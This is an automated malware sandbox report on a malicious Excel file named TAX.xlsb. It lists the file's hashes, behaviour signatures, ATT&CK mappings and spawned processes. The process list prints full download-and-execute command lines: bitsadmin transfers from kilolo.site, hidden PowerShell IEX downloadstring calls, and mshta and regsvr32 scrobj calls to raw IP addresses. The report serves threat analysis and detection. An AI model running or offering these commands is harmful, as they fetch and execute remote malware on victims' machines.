Overview

overview

10

Static

static

8

TAX.xlsb

windows7-x64

10

TAX.xlsb

windows10-2004-x64

10

Analysis

  • max time kernel
    73s
  • max time network
    60s
  • platform
    windows7_x64
  • resource
    win7-20230220-en
  • resource tags

    arch:x64arch:x86image:win7-20230220-enlocale:en-usos:windows7-x64system
  • submitted
    03-04-2023 00:30

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    TAX.xlsb

  • Size

    10KB

  • MD5

    1e1afc93c8092b2c7e49a6d3a451629f

  • SHA1

    081d3ab46a0641d952ca28eacc6d4ef3516fdfd0

  • SHA256

    ea0923854208956b1f563c5301bd0c9a8561128b7bd48c5b475ddeea29da8a1c

  • SHA512

    5ca2f6827fc93c7645660d3f787c1d074596ecd90b5b7c03748f46def274dc1d4edb931251202a9c50fb925ba2c9dda855cd42a0c90d7c313f24aaa93823150d

  • SSDEEP

    192:F5ssEP3p0o7VhgmK05bVhvtrWNpUAWvXSRo1jdF:3ssGZ0o7VhVK+hvwNmvV

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://kilolo.site/raw.txt

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://kilolo.site/raw.txt

Extracted

Language
hta
Source
URLs
hta.dropper

http://37.72.175.188:80/home

Signatures

  • Process spawned unexpected child process 11 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 2 IoCs
  • Delays execution with timeout.exe 3 IoCs
    evasion
  • Download via BitsAdmin 1 TTPs 3 IoCs
    dropper
  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 32 IoCs
    adwarespyware
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\TAX.xlsb
    1⤵
    • Enumerates system info in registry
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1244
    • C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c cd c:\&&mkdir Intel
      2⤵
      • Process spawned unexpected child process
      PID:432
    • C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c bitsadmin /transfer myjob /download /priority high https://kilolo.site/admin.bat c:\Intel\admin.bat
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:340
      • C:\Windows\SysWOW64\bitsadmin.exe
        bitsadmin /transfer myjob /download /priority high https://kilolo.site/admin.bat c:\Intel\admin.bat
        3⤵
        • Download via BitsAdmin
        PID:616
    • C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c cd c:\Intel&&timeout /t 15&&c:\Intel\admin.bat
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:576
      • C:\Windows\SysWOW64\timeout.exe
        timeout /t 15
        3⤵
        • Delays execution with timeout.exe
        PID:1624
    • C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c bitsadmin /transfer myjob /download /priority high https://kilolo.site/mer.bin c:\Intel\mer.bin
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:580
      • C:\Windows\SysWOW64\bitsadmin.exe
        bitsadmin /transfer myjob /download /priority high https://kilolo.site/mer.bin c:\Intel\mer.bin
        3⤵
        • Download via BitsAdmin
        PID:1732
    • C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c bitsadmin /transfer myjob /download /priority high https://kilolo.site/mer.dll c:\Intel\mer.dll
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:676
      • C:\Windows\SysWOW64\bitsadmin.exe
        bitsadmin /transfer myjob /download /priority high https://kilolo.site/mer.dll c:\Intel\mer.dll
        3⤵
        • Download via BitsAdmin
        PID:688
    • C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c cd c:\Intel&&timeout /t 15&& copy mer.dll mery.dll&&rundll32.exe mer.dll,Run https://38.132.124.172:443/&regsvr3
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:1852
      • C:\Windows\SysWOW64\timeout.exe
        timeout /t 15
        3⤵
        • Delays execution with timeout.exe
        PID:1764
    • C:\Windows\SysWOW64\cmd.exe
      cmd.exe /c cd c:\Intel&&timeout /t 15&&rename mer.bin mer.exe&&mer.exe
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:764
      • C:\Windows\SysWOW64\timeout.exe
        timeout /t 15
        3⤵
        • Delays execution with timeout.exe
        PID:1744
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -nop -w hidden -c IEX ((new-object net.webclient).downloadstring('http://kilolo.site/raw.txt'))
      2⤵
      • Process spawned unexpected child process
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1340
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -nop -w hidden -c IEX ((new-object net.webclient).downloadstring('https://kilolo.site/raw.txt'))
      2⤵
      • Process spawned unexpected child process
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1876
    • C:\Windows\SysWOW64\mshta.exe
      mshta http://37.72.175.188:80/home
      2⤵
      • Process spawned unexpected child process
      • Blocklisted process makes network request
      • Modifies Internet Explorer settings
      PID:1728
    • C:\Windows\SysWOW64\regsvr32.exe
      regsvr32 /s /u /n /i:http://37.72.175.188:443/index scrobj
      2⤵
      • Process spawned unexpected child process
      PID:1056

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

BITS Jobs

1
T1197

Privilege Escalation

Defense Evasion

BITS Jobs

1
T1197

Modify Registry

1
T1112

Credential Access

Discovery

Query Registry

1
T1012

System Information Discovery

1
T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\8332NI830XOJXE26HA5V.temp
    Filesize

    7KB

    MD5

    13fe200b2a43d97df088b631ac85489c

    SHA1

    efda47e0cb22ce1c706bc576006340b584842acb

    SHA256

    3f27a3f86e37776d4461e0a81a57f90a35742b089912a4c2cf25ea9a0db2db43

    SHA512

    d1e2b7f273ec490d6de20d1f410967c9e1216a9092def3e1edcfa993da74563864b92b4ac924f821d02dbd73e76f5150164b7b06c638af0b96624ae0915ec051

    Download Submit
  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
    Filesize

    7KB

    MD5

    13fe200b2a43d97df088b631ac85489c

    SHA1

    efda47e0cb22ce1c706bc576006340b584842acb

    SHA256

    3f27a3f86e37776d4461e0a81a57f90a35742b089912a4c2cf25ea9a0db2db43

    SHA512

    d1e2b7f273ec490d6de20d1f410967c9e1216a9092def3e1edcfa993da74563864b92b4ac924f821d02dbd73e76f5150164b7b06c638af0b96624ae0915ec051

    Download Submit
  • memory/1244-54-0x000000005FFF0000-0x0000000060000000-memory.dmp
    Filesize

    64KB

    Download
  • memory/1340-63-0x00000000022E0000-0x0000000002320000-memory.dmp
    Filesize

    256KB

    Download
  • memory/1876-62-0x00000000024A0000-0x00000000024E0000-memory.dmp
    Filesize

    256KB

    Download